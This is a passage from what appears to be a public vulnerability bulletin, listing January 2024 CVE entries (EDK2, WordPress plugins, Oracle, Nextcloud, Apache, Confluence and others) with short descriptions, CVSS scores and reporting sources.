tianocore -- edk2EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing the IA_NA or IA_TA option in a DHCPv6 Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.2024-01-166.5CVE-2023-45229
infosec@edk2.groups.io
infosec@edk2.groups.io
infosec@edk2.groups.io
tianocore -- edk2EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing Neighbor Discovery Redirect message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.2024-01-166.5CVE-2023-45231
infosec@edk2.groups.io
infosec@edk2.groups.io
infosec@edk2.groups.io
tianocore -- edk2EDK2's Network Package is susceptible to a predictable TCP Initial Sequence Number. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.2024-01-165.8CVE-2023-45236
infosec@edk2.groups.io
infosec@edk2.groups.io
tianocore -- edk2EDK2's Network Package is susceptible to a predictable TCP Initial Sequence Number. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.2024-01-165.3CVE-2023-45237
infosec@edk2.groups.io
infosec@edk2.groups.io
totolink -- t8A vulnerability classified as problematic has been found in Totolink T8 4.1.5cu.833_20220905. This affects the function getSysStatusCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument ssid/key leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.5cu.862_B20230228 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-250785 was assigned to this vulnerability.2024-01-164.3CVE-2024-0569
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tribe29 -- checkmkInsufficient authentication flow in Checkmk before 2.2.0p18, 2.1.0p38 and 2.0.0p39 allows attacker to use locked credentials2024-01-126.5CVE-2023-31211
security@checkmk.com
ujcms -- ujcmsFile Upload vulnerability in Ujcms v.8.0.2 allows a local attacker to execute arbitrary code via a crafted file.2024-01-125.4CVE-2023-51806
cve@mitre.org
cve@mitre.org
cve@mitre.org
ursa -- CL-signaturesUrsa is a cryptographic library for use with blockchains. The revocation scheme that is part of the Ursa CL-Signatures implementations has a flaw that could impact the privacy guarantees defined by the AnonCreds verifiable credential model. Notably, a malicious verifier may be able to generate a unique identifier for a holder providing a verifiable presentation that includes a Non-Revocation proof. The impact of the flaw is that a malicious verifier may be able to determine a unique identifier for a holder presenting a Non-Revocation proof. Ursa has moved to end-of-life status and no fix is expected.2024-01-166.5CVE-2024-22192
security-advisories@github.com
vagary_digital -- hreflang_tags_liteMissing Authorization vulnerability in Vagary Digital HREFLANG Tags Lite.This issue affects HREFLANG Tags Lite: from n/a through 2.0.0.2024-01-176.5CVE-2022-36418
audit@patchstack.com
vektor-inc -- vk_block_patternsThe VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.2024-01-204.3CVE-2024-0623
security@wordfence.com
security@wordfence.com
webkul -- bagistoCross Site Scripting vulnerability in webkil Bagisto v.1.5.0 and before allows an attacker to execute arbitrary code via a crafted SVG file uplad.2024-01-164.8CVE-2023-36236
cve@mitre.org
cve@mitre.org
cve@mitre.org
woocommerce -- woocommerceThe WooCommerce WordPress plugin before 6.2.1 does not have proper authorisation check when deleting reviews, which could allow any authenticated users, such as subscriber to delete arbitrary comment2024-01-164.3CVE-2022-0775
contact@wpscan.com
contact@wpscan.com
contact@wpscan.com
wp_job_portal -- wp_job_portal_a_complete_job_boardMissing Authorization vulnerability in WP Job Portal WP Job Portal - A Complete Job Board.This issue affects WP Job Portal - A Complete Job Board: from n/a through 2.0.1.2024-01-175.4CVE-2022-41786
audit@patchstack.com
wpfastestcache -- wp_fastest_cacheThe WP Fastest Cache WordPress plugin before 0.9.5 is lacking a CSRF check in its wpfc_save_cdn_integration AJAX action, and does not sanitise and escape some the options available via the action, which could allow attackers to make logged in high privilege users call it and set a Cross-Site Scripting payload2024-01-166.1CVE-2021-24870
contact@wpscan.com
contact@wpscan.com
wpmet -- wp_social_login_and_register_social_counterExposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter.This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0.2024-01-196.5CVE-2022-47160
audit@patchstack.com
x.org -- x.orgA flaw was found in the X.Org server. The GLX PBuffer code does not call the XACE hook when creating the buffer, leaving it unlabeled. When the client issues another request to access that resource (as with a GetGeometry) or when it creates another resource that needs to access that buffer, such as a GC, the XSELINUX code will try to use an object that was never labeled and crash because the SID is NULL.2024-01-185.5CVE-2024-0408
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
xlightftpd -- xlight_ftp_serverA vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560.2024-01-195.3CVE-2024-0737
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
yikesinc -- easy_forms_for_mailchimpThe Easy Forms for Mailchimp WordPress plugin through 6.8.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed2024-01-154.8CVE-2023-4925
contact@wpscan.com
zhihuiyun -- download_network_imageA vulnerability was found in ZhiHuiYun up to 4.4.13 and classified as critical. This issue affects the function download_network_image of the file /app/Http/Controllers/ImageController.php of the component Search. The manipulation of the argument url leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251375.2024-01-176.3CVE-2024-0649
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
zhongfucheng3y -- austinA vulnerability was found in ZhongFuCheng3y Austin 1.0. It has been rated as critical. Affected by this issue is the function getRemoteUrl2File of the file src\main\java\com\java3y\austin\support\utils\AustinFileUtils.java of the component Email Message Template Handler. The manipulation leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250838 is the identifier assigned to this vulnerability.2024-01-166.3CVE-2024-0601
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
zhongfucheng3y_austin -- zhongfucheng3y_austinA vulnerability was found in ZhongFuCheng3y Austin 1.0 and classified as critical. This issue affects the function getFile of the file com/java3y/austin/web/controller/MaterialController.java of the component Upload Material Menu. The manipulation leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250619.2024-01-135.5CVE-2024-0505
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
zorem -- advanced_local_pickup_for_woocommerceMissing Authorization vulnerability in Zorem Advanced Local Pickup for WooCommerce.This issue affects Advanced Local Pickup for WooCommerce: from n/a through 1.5.2.2024-01-175.4CVE-2022-40702
audit@patchstack.com
zorem -- sales_report_email_for_woocommerceMissing Authorization vulnerability in Zorem Sales Report Email for WooCommerce. This issue affects Sales Report Email for WooCommerce: from n/a through 2.8.2024-01-174.3CVE-2022-38141
audit@patchstack.com

Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
apple -- magic_keyboard_firmwareA session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic.2024-01-122.4CVE-2024-0230
product-security@apple.com
atrocore -- atropimA vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-183.5CVE-2024-0696
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
beijing_baichuo -- smart_s150_management_platformA vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-193.1CVE-2024-0716
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
dedebiz -- dedebizA vulnerability, which was classified as problematic, was found in DedeBIZ 6.3.0. This affects an unknown part of the component Website Copyright Setting. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250725 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-152.4CVE-2024-0557
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
dgtlmoon -- changedetection.iochangedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch/<uuid>/history` can be accessed by any unauthorized user. As a result any unauthorized user can check one's watch history. However, because unauthorized party first needs to know a watch UUID, and the watch history endpoint itself returns only paths to the snapshot on the server, an impact on users' data privacy is minimal. This issue has been addressed in version 0.45.13. Users are advised to upgrade. There are no known workarounds for this vulnerability.2024-01-193.7CVE-2024-23329
security-advisories@github.com
security-advisories@github.com
discourse -- discourseDiscourse-reactions is a plugin that allows user to add their reactions to the post. Data about a user's reaction notifications could be exposed. This vulnerability was patched in commit 2c26939.2024-01-123.5CVE-2023-49098
security-advisories@github.com
security-advisories@github.com
discourse -- discourseDiscourse is a platform for community discussion. Under very specific circumstances, secure upload URLs associated with posts can be accessed by guest users even when login is required. This vulnerability has been patched in 3.2.0.beta4 and 3.1.4.2024-01-123.1CVE-2023-49099
security-advisories@github.com
security-advisories@github.com
factominer -- factoinvestigateA vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2024-01-193.5CVE-2024-0720
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
freerdp -- freerdpFreeRDP is a set of free and open source remote desktop protocol library and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to heap-buffer overflow. This affects FreeRDP based clients. FreeRDP based server implementations and proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too small buffers, possibly triggering later out of bound read/write. Data extraction over network is not possible, the buffers are used to display an image. This issue has been addressed in version 2.11.5 and 3.2.0. Users are advised to upgrade. there are no know workarounds for this vulnerability.2024-01-193.7CVE-2024-22211
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
gluwa -- creditcoinCreditcoin is a network that enables cross-blockchain credit transactions. The Windows binary of the Creditcoin node loads a suite of DLLs provided by Microsoft at startup. If a malicious user has access to overwrite the program files directory it is possible to replace these DLLs and execute arbitrary code. It is the view of the blockchain development team that the threat posed by a hypothetical binary planting attack is minimal and represents a low-security risk. The vulnerable DLL files are from the Windows networking subsystem, the Visual C++ runtime, and low-level cryptographic primitives. Collectively these dependencies are required for a large ecosystem of applications, ranging from enterprise-level security applications to game engines, and don't represent a fundamental lack of security or oversight in the design and implementation of Creditcoin. The blockchain team takes the stance that running Creditcoin on Windows is officially unsupported and at best should be thought of as experimental.2024-01-173.3CVE-2024-22410
security-advisories@github.com
security-advisories@github.com
hcl_software -- hcl_bigfix_osd_bare_metal_server_webuiHCL BigFix Bare OSD Metal Server WebUI version 311.19 or lower can sometimes include sensitive information in a query string which could allow an attacker to execute a malicious attack.2024-01-162.3CVE-2023-37521
psirt@hcl.com
ibm -- qradar_siemIBM QRadar SIEM 7.5 could disclose sensitive email information in responses from offense rules. IBM X-Force ID: 275709.2024-01-173.7CVE-2023-50950
psirt@us.ibm.com
psirt@us.ibm.com
jspxcms -- jspxcmsA vulnerability was found in Jspxcms 10.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file src\main\java\com\jspxcms\core\web\back\InfoController.java of the component Document Management Page. The manipulation of the argument title leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250837 was assigned to this vulnerability.2024-01-163.5CVE-2024-0599
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
jspxcms -- jspxcmsA vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability.2024-01-193.5CVE-2024-0721
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
lenovo -- tabletAn information disclosure vulnerability was reported in the Lenovo Tab M8 HD that could allow a local application to gather a non-resettable device identifier.2024-01-193.3CVE-2023-5081
psirt@lenovo.com
liuwy-dlsdys -- zhglxtA vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543.2024-01-192.4CVE-2024-0718
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
nextcloud -- security-advisoriesNextcloud User Saml is an app for authenticating Nextcloud users using SAML. In affected versions users can be given a link to the Nextcloud server and end up on a uncontrolled thirdparty server. It is recommended that the User Saml app is upgraded to version 5.1.5, 5.2.5, or 6.0.1. There are no known workarounds for this issue.2024-01-183.1CVE-2024-22400
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
nextcloud -- security-advisoriesNextcloud server is a self hosted personal cloud system. In affected versions OAuth codes did not expire. When an attacker would get access to an authorization code they could authenticate at any time using the code. As of version 28.0.0 OAuth codes are invalidated after 10 minutes and will no longer be authenticated. To exploit this vulnerability an attacker would need to intercept an OAuth code from a user session. It is recommended that the Nextcloud Server is upgraded to 28.0.0. There are no known workarounds for this vulnerability.2024-01-183CVE-2024-22403
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
oracle -- jd_edwards_enterpriseone_toolsVulnerability in the JD Edwards EnterpriseOne Tools product of Oracle JD Edwards (component: Package Build SEC). Supported versions that are affected are Prior to 9.2.8.1. Easily exploitable vulnerability allows high privileged attacker with network access via JDENET to compromise JD Edwards EnterpriseOne Tools. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of JD Edwards EnterpriseOne Tools. CVSS 3.1 Base Score 2.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).2024-01-162.7CVE-2024-20957
secalert_us@oracle.com
oracle -- solarisVulnerability in the Oracle Solaris product of Oracle Systems (component: Filesystem). The supported version that is affected is 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Solaris accessible data. CVSS 3.1 Base Score 3.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N).2024-01-163.8CVE-2024-20920
secalert_us@oracle.com
oracle -- zfs_storage_appliance_kitVulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Core). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle ZFS Storage Appliance Kit executes to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle ZFS Storage Appliance Kit accessible data. CVSS 3.1 Base Score 2.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N).2024-01-162.3CVE-2024-20914
secalert_us@oracle.com
oracle_corporation -- audit_vault_and_database_firewallVulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Difficult to exploit vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. While the vulnerability is in Oracle Audit Vault and Database Firewall, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 3.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:N).2024-01-163CVE-2024-20910
secalert_us@oracle.com
oracle_corporation -- audit_vault_and_database_firewallVulnerability in Oracle Audit Vault and Database Firewall (component: Firewall). Supported versions that are affected are 20.1-20.9. Easily exploitable vulnerability allows high privileged attacker with network access via Oracle Net to compromise Oracle Audit Vault and Database Firewall. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Audit Vault and Database Firewall accessible data. CVSS 3.1 Base Score 2.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N).2024-01-162.7CVE-2024-20912
secalert_us@oracle.com
oracle_corporation -- graalvm_enterprise_editionVulnerability in the Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Compiler). Supported versions that are affected are Oracle GraalVM for JDK: 17.0.9; Oracle GraalVM Enterprise Edition: 21.3.8 and 22.3.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N).2024-01-163.7CVE-2024-20955
secalert_us@oracle.com
oracle_corporation -- java_se_jdk_and_jreVulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).2024-01-162.5CVE-2024-20922
secalert_us@oracle.com
social_networking_site -- social_networking_siteA vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability.2024-01-193.5CVE-2024-0722
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
ursa -- ursaUrsa is a cryptographic library for use with blockchains. A weakness in the Hyperledger AnonCreds specification that is not mitigated in the Ursa and AnonCreds implementations is that the Issuer does not publish a key correctness proof demonstrating that a generated private key is sufficient to meet the unlinkability guarantees of AnonCreds. The Ursa and AnonCreds CL-Signatures implementations always generate a sufficient private key. A malicious issuer could in theory create a custom CL Signature implementation (derived from the Ursa or AnonCreds CL-Signatures implementations) that uses weakened private keys such that presentations from holders could be shared by verifiers to the issuer who could determine the holder to which the credential was issued. This vulnerability could impact holders of AnonCreds credentials implemented using the CL-signature scheme in the Ursa and AnonCreds implementations of CL Signatures. The ursa project has has moved to end-of-life status and no fix is expected.2024-01-163.3CVE-2022-31021
security-advisories@github.com
security-advisories@github.com

Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
wordpress -- wordpressThe WP-Invoice WordPress plugin through 4.3.1 does not have CSRF check in place when updating its settings, and is lacking sanitization as well as escaping in some of them, allowing attacker to make a logged in admin change them and add XSS payload in them2024-01-16not yet calculatedCVE-2022-1617
contact@wpscan.com
202_ecommerce -- advanced_loyalty_program: loyalty_ points_before_v2.3.4An issue in 202 ecommerce Advanced Loyalty Program: Loyalty Points before v2.3.4 for PrestaShop allows unauthenticated attackers to arbitrarily change an order status.2024-01-16not yet calculatedCVE-2023-48926
cve@mitre.org
abo.cms -- abo.comsA Cross-site scripting (XSS) vulnerability in login page php code in Armex ABO.CMS 5.9 allows remote attackers to inject arbitrary web script or HTML via the login.php? URL part.2024-01-17not yet calculatedCVE-2023-48858
cve@mitre.org
cve@mitre.org
abo.cms -- abo.cmsCross Site Scripting vulnerability in ABO.CMS v.5.9.3 allows an attacker to execute arbitrary code via a crafted payload to the Referer header.2024-01-17not yet calculatedCVE-2023-46952
cve@mitre.org
cve@mitre.org
cve@mitre.org

actidata -- actinas_sl_2u-8_rdx_3.2.03-sp1

Multiple reflected cross-site scripting (XSS) vulnerabilities in nasSvr.php in actidata actiNAS-SL-2U-8 3.2.03-SP1 allow remote attackers to inject arbitrary web script or HTML.2024-01-19not yet calculatedCVE-2023-51946
cve@mitre.org
cve@mitre.org
cve@mitre.org
actidata -- actinas_sl_2u-8_rdx_3.2.03-sp1Improper access control on nasSvr.php in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to read and modify different types of data without authentication.2024-01-19not yet calculatedCVE-2023-51947
cve@mitre.org
cve@mitre.org
cve@mitre.org
actidata -- actinas_sl_2u-8_rdx_3.2.03-sp1A Site-wide directory listing vulnerability in /fm in actidata actiNAS SL 2U-8 RDX 3.2.03-SP1 allows remote attackers to list the files hosted by the web application.2024-01-19not yet calculatedCVE-2023-51948
cve@mitre.org
cve@mitre.org
alinto -- sogoAlinto SOGo before 5.9.1 is vulnerable to HTML Injection.2024-01-16not yet calculatedCVE-2023-48104
cve@mitre.org
cve@mitre.org
amazon_web_services -- encryption_sdkAWS Encryption SDK for Java versions 2.0.0 to 2.2.0 and less than 1.9.0 incorrectly validates some invalid ECDSA signatures.2024-01-19not yet calculatedCVE-2024-23680
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
anomali -- matchAnomali Match before 4.6.2 allows OS Command Injection. An authenticated admin user can inject and execute operating system commands. This arises from improper handling of untrusted input, enabling an attacker to elevate privileges, execute system commands, and potentially compromise the underlying operating system. The fixed versions are 4.4.5, 4.5.4, and 4.6.2. The earliest affected version is 4.3.2024-01-19not yet calculatedCVE-2023-49329
cve@mitre.org
cve@mitre.org
apache -- iotdbRemote Code Execution vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 1.0.0 through 1.2.2. Users are recommended to upgrade to version 1.3.0, which fixes the issue.2024-01-15not yet calculatedCVE-2023-46226
security@apache.org
security@apache.org
apache -- tomcatGeneration of Error Message Containing Sensitive Information vulnerability in Apache Tomcat.This issue affects Apache Tomcat: from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43. Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.2024-01-19not yet calculatedCVE-2024-21733
security@apache.org
security@apache.org
apache -- shiroApache Shiro before 1.13.0 or 2.0.0-alpha-4, may be susceptible to a path traversal attack that results in an authentication bypass when used together with path rewriting Mitigation: Update to Apache Shiro 1.13.0+ or 2.0.0-alpha-4+, or ensure `blockSemicolon` is enabled (this is the default).2024-01-15not yet calculatedCVE-2023-46749
security@apache.org
apache -- solrExposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Solr. The Solr Metrics API publishes all unprotected environment variables available to each Apache Solr instance. Users are able to specify which environment variables to hide, however, the default list is designed to work for known secret Java system properties. Environment variables cannot be strictly defined in Solr, like Java system properties can be, and may be set for the entire host, unlike Java system properties which are set per-Java-proccess. The Solr Metrics API is protected by the "metrics-read" permission. Therefore, Solr Clouds with Authorization setup will only be vulnerable via users with the "metrics-read" permission. This issue affects Apache Solr: from 9.0.0 before 9.3.0. Users are recommended to upgrade to version 9.3.0 or later, in which environment variables are not published via the Metrics API.2024-01-15not yet calculatedCVE-2023-50290
security@apache.org
artemis_java_test_sandbox -- artemis_java_test_sandboxArtemis Java Test Sandbox versions before 1.11.2 are vulnerable to a sandbox escape when an attacker loads untrusted libraries using System.load or System.loadLibrary. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.2024-01-19not yet calculatedCVE-2024-23681
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
artemis_java_test_sandbox -- artemis_java_test_sandboxArtemis Java Test Sandbox versions before 1.8.0 are vulnerable to a sandbox escape when an attacker includes class files in a package that Ares trusts. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.2024-01-19not yet calculatedCVE-2024-23682
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
artemis_java_test_sandbox -- artemis_java_test_sandboxArtemis Java Test Sandbox versions less than 1.7.6 are vulnerable to a sandbox escape when an attacker crafts a special subclass of InvocationTargetException. An attacker can abuse this issue to execute arbitrary Java when a victim executes the supposedly sandboxed code.2024-01-19not yet calculatedCVE-2024-23683
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
atlassian -- confluence_data_centerThis High severity RCE (Remote Code Execution) vulnerability was introduced in version 7.19.0 of Confluence Data Center. This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.2, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction. Atlassian recommends that Confluence Data Center customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: Confluence Data Center and Server 7.19: Upgrade to a release 7.19.17, or any higher 7.19.x release Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release See the release notes ([https://confluence.atlassian.com/doc/confluence-release-notes-327.html]). You can download the latest version of Confluence Data Center from the download center ([https://www.atlassian.com/software/confluence/download-archives]). This vulnerability was discovered by m1sn0w and reported via our Bug Bounty program2024-01-16not yet calculatedCVE-2023-22526
security@atlassian.com
security@atlassian.com
atlassian -- confluence_data_centerA template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action. Most recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian's January Security Bulletin.2024-01-16not yet calculatedCVE-2023-22527
security@atlassian.com
security@atlassian.com
atlassian -- confluence_data_center/confluence_serverThis High severity Remote Code Execution (RCE) vulnerability was introduced in version 2.1.0 of Confluence Data Center and Server. Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.3 and a CVSS Vector of CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H allows an unauthenticated attacker to remotely expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release * Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives).2024-01-16not yet calculatedCVE-2024-21672
security@atlassian.com
atlassian -- confluence_data_center/confluence_serverThis High severity Remote Code Execution (RCE) vulnerability was introduced in versions 7.13.0 of Confluence Data Center and Server. Remote Code Execution (RCE) vulnerability, with a CVSS Score of 8.0 and a CVSS Vector of CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H allows an authenticated attacker to expose assets in your environment susceptible to exploitation which has high impact to confidentiality, high impact to integrity, high impact to availability, and does not require user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: * Confluence Data Center and Server 7.19: Upgrade to a release 7.19.18, or any higher 7.19.x release * Confluence Data Center and Server 8.5: Upgrade to a release 8.5.5 or any higher 8.5.x release * Confluence Data Center and Server 8.7: Upgrade to a release 8.7.2 or any higher release See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html ). You can download the latest version of Confluence Data Center and Server from the download center (https://www.atlassian.com/software/confluence/download-archives ).2024-01-16not yet calculatedCVE-2024-21673
security@atlassian.com
